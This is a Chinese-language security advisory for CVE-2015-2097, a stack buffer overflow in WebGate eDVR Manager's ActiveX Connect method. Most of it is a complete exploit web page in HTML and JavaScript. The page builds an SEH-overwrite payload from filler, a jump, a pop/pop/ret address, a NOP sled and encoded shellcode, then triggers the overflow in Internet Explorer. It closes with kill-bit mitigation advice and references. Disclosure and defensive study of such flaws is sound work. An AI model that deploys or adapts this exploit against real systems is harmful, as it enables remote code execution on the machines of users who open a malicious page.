
WebGate eDVR Manager 2.6.4 Connect方法栈缓冲区溢出漏洞

     发表日期:2015-04-09 10:38:00

WebGate eDVR Manager 2.6.4 Connect方法栈缓冲区溢出漏洞(CVE-2015-2097)
CVE-ID:CVE-2015-2097
发布日期:2015-04-02
更新日期:2015-04-03
受影响系统:
Webgate eDVR Manager 2.6.4
详细信息:
 
WebGate eDVR Manager是eDVR设备管理器。
 
 
 
WebGate Embedded Standard Protocol (WESP) SDK存在多个缓冲区溢出漏洞，远程攻击者可诱使用户在安装了该SDK的Internet Explorer中打开恶意网页，从而以当前用户权限执行任意代码。本漏洞位于WESPSerialPort.WESPSerialPortCtrl.1控件(CLSID BAAA6516-267C-466D-93F5-C504EF973837)的Connect方法中：该方法未对UserID参数(第三个参数)的长度进行检查，超长字符串会导致栈缓冲区溢出并覆盖SEH记录，下文的测试方法即利用这一点。
 
 
来源:
rgod (rgod@autistici.org)
测试方法:
警告：以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
 
<!--
 
# Exploit Title: WebGate eDVR Manager Connect Method Stack Buffer Overflow
 
# Date: 01st April, 2015
 
# Exploit Author: Praveen Darshanam
 
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
 
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
 
# Tested on: Windows XP SP3 using IE8
 
# CVE : CVE-2015-2097
 
 
 
targetFile = "C:\\WINDOWS\\system32\\WESPSDK\\WESPSerialPort.dll"
 
prototype  = "Sub Connect ( ByVal IPAddr As String ,  ByVal PortNum As Integer ,  ByVal UserID As String ,  ByVal Password As String )"
 
progid     = "WESPSERIALPORTLib.WESPSerialPortCtrl"
 
Tested on IE8
 
Author: Praveen Darshanam
 
http://blog.disects.com/
 
http://darshanams.blogspot.com/
 
P.S. Do not remove back slashes in shellcode and other variables
 
-->
 
 
 
<object classid=\'clsid:BAAA6516-267C-466D-93F5-C504EF973837\' id=\'target\'>
 
</object>
 
<script>
 
 
 
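// Arguments for WESPSerialPortCtrl.Connect(IPAddr, PortNum, UserID, Password)
// (prototype quoted in the header comment above). Only the third argument,
// UserID, carries the overflow payload; the other three are filler.
// `var` is used throughout on purpose: the listing targets IE8, which has no
// let/const or String.prototype.repeat.
var arg1 = "PraveenD";
var arg2 = 1;
var arg4 = "PraveenD";

// Returns `count` copies of `piece` concatenated; a negative or zero count
// yields "" (same as the original open-coded loops).
function repeatStr(piece, count) {
    var out = "";
    for (var k = 0; k < count; k++) {
        out += piece;
    }
    return out;
}

// NOTE(review): every byte escape below is written with a doubled backslash
// ("\\xeb"), which in JavaScript yields the four literal characters \xeb,
// not the byte 0xEB. The author's P.S. asks that the backslashes be kept, and
// the object tag's \' escapes suggest the listing passed through an extra
// escaping layer; confirm against the original exploit before reuse.

// 1664 bytes of filler reach the SEH record on the stack.
var arg3 = repeatStr("B", 1664);

// Overwritten SEH record: next-SEH is a short jump (eb 10) over the handler
// address, and the handler address is a pop/pop/ret gadget at 0x100104e7 in
// WESPSerialPort.dll.
var nseh = "\\xeb\\x10PD";
var seh = "\\xe7\\x04\\x01\\x10";

// NOP sled preceding the payload.
var nops = repeatStr("\\x90", 80);

// Encoded payload. The author does not state the encoder; the leading bytes
// look like a GetPC stub followed by alphanumeric decoder bytes, so
// presumably an alpha-mixed style encoder — not verified here.
var shellcode = "\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49" +
    "\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30" +
    "\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30" +
    "\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42" +
    "\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a" +
    "\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30" +
    "\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c" +
    "\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b" +
    "\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38" +
    "\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c" +
    "\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48" +
    "\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32" +
    "\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37" +
    "\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58" +
    "\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53" +
    "\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a" +
    "\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56" +
    "\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51" +
    "\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43" +
    "\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34" +
    "\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42" +
    "\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c" +
    "\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48" +
    "\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b" +
    "\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31" +
    "\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d" +
    "\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43" +
    "\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b" +
    "\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48" +
    "\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d" +
    "\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45" +
    "\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b" +
    "\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46" +
    "\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43" +
    "\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41";

// Pad the whole argument out to 8000 characters; no padding if the pieces
// already exceed that.
var padLen = 8000 - (arg3.length + nseh.length + seh.length + nops.length + shellcode.length);
var buff2 = repeatStr("A", padLen);

// All locals are declared with `var` so nothing leaks as an implicit global
// (the original left `i` and `fbuff` undeclared).
var fbuff = arg3 + nseh + seh + nops + shellcode + buff2;

// Trigger: `target` is the <object> element declared above; the oversized
// UserID string overflows a stack buffer inside Connect (CVE-2015-2097).
target.Connect(arg1, arg2, fbuff, arg4);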
 
 
 
</script>
 
</html>
解决办法:
厂商补丁:
 
Webgate
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布前，可通过以下方式缓解：在注册表中为该控件的CLSID (BAAA6516-267C-466D-93F5-C504EF973837) 设置Kill Bit(HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} 下的 Compatibility Flags 设为 0x400)，以阻止Internet Explorer实例化该控件；或在不需要时卸载/禁用WESPSDK的ActiveX控件。厂商下载页面:
 
 
 
http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
 
 
 
参考:
 
 
 
http://seclists.org/fulldisclosure/2015/Feb/90
 
http://www.zerodayinitiative.com/advisories/ZDI-15-059/
 
http://www.zerodayinitiative.com/advisories/ZDI-15-062/
 
http://www.zerodayinitiative.com/advisories/ZDI-15-068/